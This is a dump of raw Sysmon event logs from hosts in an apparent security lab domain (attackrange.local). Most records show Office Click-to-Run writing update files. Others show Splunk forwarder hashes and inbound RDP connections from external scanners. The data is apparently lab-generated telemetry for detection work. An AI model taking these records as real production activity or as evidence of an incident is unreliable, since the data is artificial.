14:54:07.612{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\csi.dll2021-04-20 14:54:07.612 11241100x800000000000000064042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSIRESOURCES.DLL2021-04-20 14:54:07.597 11241100x800000000000000064041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\DBGCORE.DLL2021-04-20 14:54:07.597 11241100x800000000000000064040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EntityDataHandler.dll2021-04-20 14:54:07.597 11241100x800000000000000064039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.597{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EntityPicker.dll2021-04-20 14:54:07.597 11241100x800000000000000064038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EXSEC32.DLL2021-04-20 14:54:07.534 11241100x800000000000000064037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FilterModule.dll2021-04-20 14:54:07.534 11241100x800000000000000064036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.503{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GFX.DLL2021-04-20 14:54:07.503 11241100x800000000000000064035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.487{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GKPowerPoint.dll2021-04-20 14:54:07.487 11241100x800000000000000064034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GKWord.dll2021-04-20 14:54:07.456 11241100x800000000000000064033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.456{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCard\TPN.txt2021-04-20 14:54:07.440 11241100x800000000000000064032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\TPN.txt2021-04-20 14:54:07.440 11241100x800000000000000064031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lpklegal.txt2021-04-20 14:54:07.425 11241100x800000000000000064030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:07.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Lync2013_Third_Party_Notices.txt2021-04-20 14:54:07.425 11241100x800000000000000064029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:07.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lync99.exe2021-04-20 14:54:07.425 11241100x800000000000000064028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.425{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MAPIPH.DLL2021-04-20 14:54:07.425 11241100x800000000000000064027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Microsoft.Ink.Recognition.DLL2021-04-20 14:54:07.284 11241100x800000000000000064026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Microsoft.Office.PolicyTips.dll2021-04-20 14:54:07.284 11241100x800000000000000064025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MIMEDIR.DLL2021-04-20 14:54:07.284 11241100x800000000000000064024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MORPH9.DLL2021-04-20 14:54:07.284 11241100x800000000000000064023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSBARCODE.DLL2021-04-20 14:54:07.284 11241100x800000000000000064022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:07.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7.dll2021-04-20 14:54:07.284 23542300x800000000000000049461Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:07.307{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=086F06ED60AC08AA452541CABE50DDA8,SHA256=B4CC03BB7C2226D33118A4FED532F67E1270C67811CE714AA33C3993E82817CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049460Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:04.730{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51675-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049459Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:04.620{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60193-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000064069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:06.872{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57886- 11241100x800000000000000064068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL2021-04-20 14:54:08.659 11241100x800000000000000064067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso20win32client.dll2021-04-20 14:54:08.659 23542300x800000000000000064066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:08.534{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54DCA8D100B3862C916EFD8F6A9674B7,SHA256=58AA830DF19F3EFB63F9D1805215DAED810B7C5C18D9CE3FC36401EB65CE1D9B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office15\pidgenx.dll2021-04-20 14:54:08.268 11241100x800000000000000064064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\AdHocReportingExcelClient.dll2021-04-20 14:54:08.128 11241100x800000000000000064063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\MICROSOFT.DATA.RECOMMENDATION.COMMON.DLL2021-04-20 14:54:08.128 11241100x800000000000000064062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\EXCELPLUGINSHELL.DLL2021-04-20 14:54:08.112 11241100x800000000000000064061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Office.Interop.Outlook.dll2021-04-20 14:54:08.112 11241100x800000000000000064060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\DATATRANSFORMERWRAPPER.DLL2021-04-20 14:54:08.112 23542300x800000000000000064059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:08.112{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A96B1FEDB837CD54CB804A91E2EEE99E,SHA256=BBCF258BE628DB1C06E1E14539F83423CAB095DBB5B7056F49343C488D913609,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\otkloadr_x64.dll2021-04-20 14:54:08.112 11241100x800000000000000064057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\PRIVATE_ODBC32.dll2021-04-20 14:54:08.112 11241100x800000000000000064056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:08.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\MSOSEC.DLL2021-04-20 14:54:08.112 23542300x800000000000000049463Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:08.338{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB71EB5E78C909168789B21DA20C740B,SHA256=04769194C0A62A88E23DDB93A18CADD6F4BA45ED4E2F098C9C386CAE30E073BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049462Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:05.852{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52480-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 11241100x800000000000000064158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1XTOR.DLL2021-04-20 14:54:09.675 11241100x800000000000000064157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.706{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OSFROAMINGPROXY.DLL2021-04-20 14:54:09.706 11241100x800000000000000064156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLRPC.DLL2021-04-20 14:54:09.690 11241100x800000000000000064155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OUTLVBS.DLL2021-04-20 14:54:09.690 11241100x800000000000000064154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OfficeJs_Core.DLL2021-04-20 14:54:09.690 11241100x800000000000000064153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SOCIALPROVIDER.DLL2021-04-20 14:54:09.675 11241100x800000000000000064152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SEQCHK10.DLL2021-04-20 14:54:09.675 11241100x800000000000000064151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VCRUNTIME140_APP.DLL2021-04-20 14:54:09.675 11241100x800000000000000064150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VCCORLIB140_APP.DLL2021-04-20 14:54:09.675 11241100x800000000000000064149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SENDTO.DLL2021-04-20 14:54:09.675 11241100x800000000000000064148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SDXHelperBgt.exe2021-04-20 14:54:09.675 11241100x800000000000000064147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\REFEDIT.DLL2021-04-20 14:54:09.675 11241100x800000000000000064146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\RECALL.DLL2021-04-20 14:54:09.675 11241100x800000000000000064145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PRTF9.DLL2021-04-20 14:54:09.675 11241100x800000000000000064144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPSLAX.DLL2021-04-20 14:54:09.675 11241100x800000000000000064143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1CORE.DLL2021-04-20 14:54:09.675 11241100x800000000000000064142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\MSCONV97.DLL2021-04-20 14:54:09.675 11241100x800000000000000064141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\SmartTagInstall.exe2021-04-20 14:54:09.675 11241100x800000000000000064140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\MOFL.DLL2021-04-20 14:54:09.675 11241100x800000000000000064139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\METCONV.DLL2021-04-20 14:54:09.675 11241100x800000000000000064138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\IMCONTACT.DLL2021-04-20 14:54:09.675 11241100x800000000000000064137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\IETAG.DLL2021-04-20 14:54:09.675 11241100x800000000000000064136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:09.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 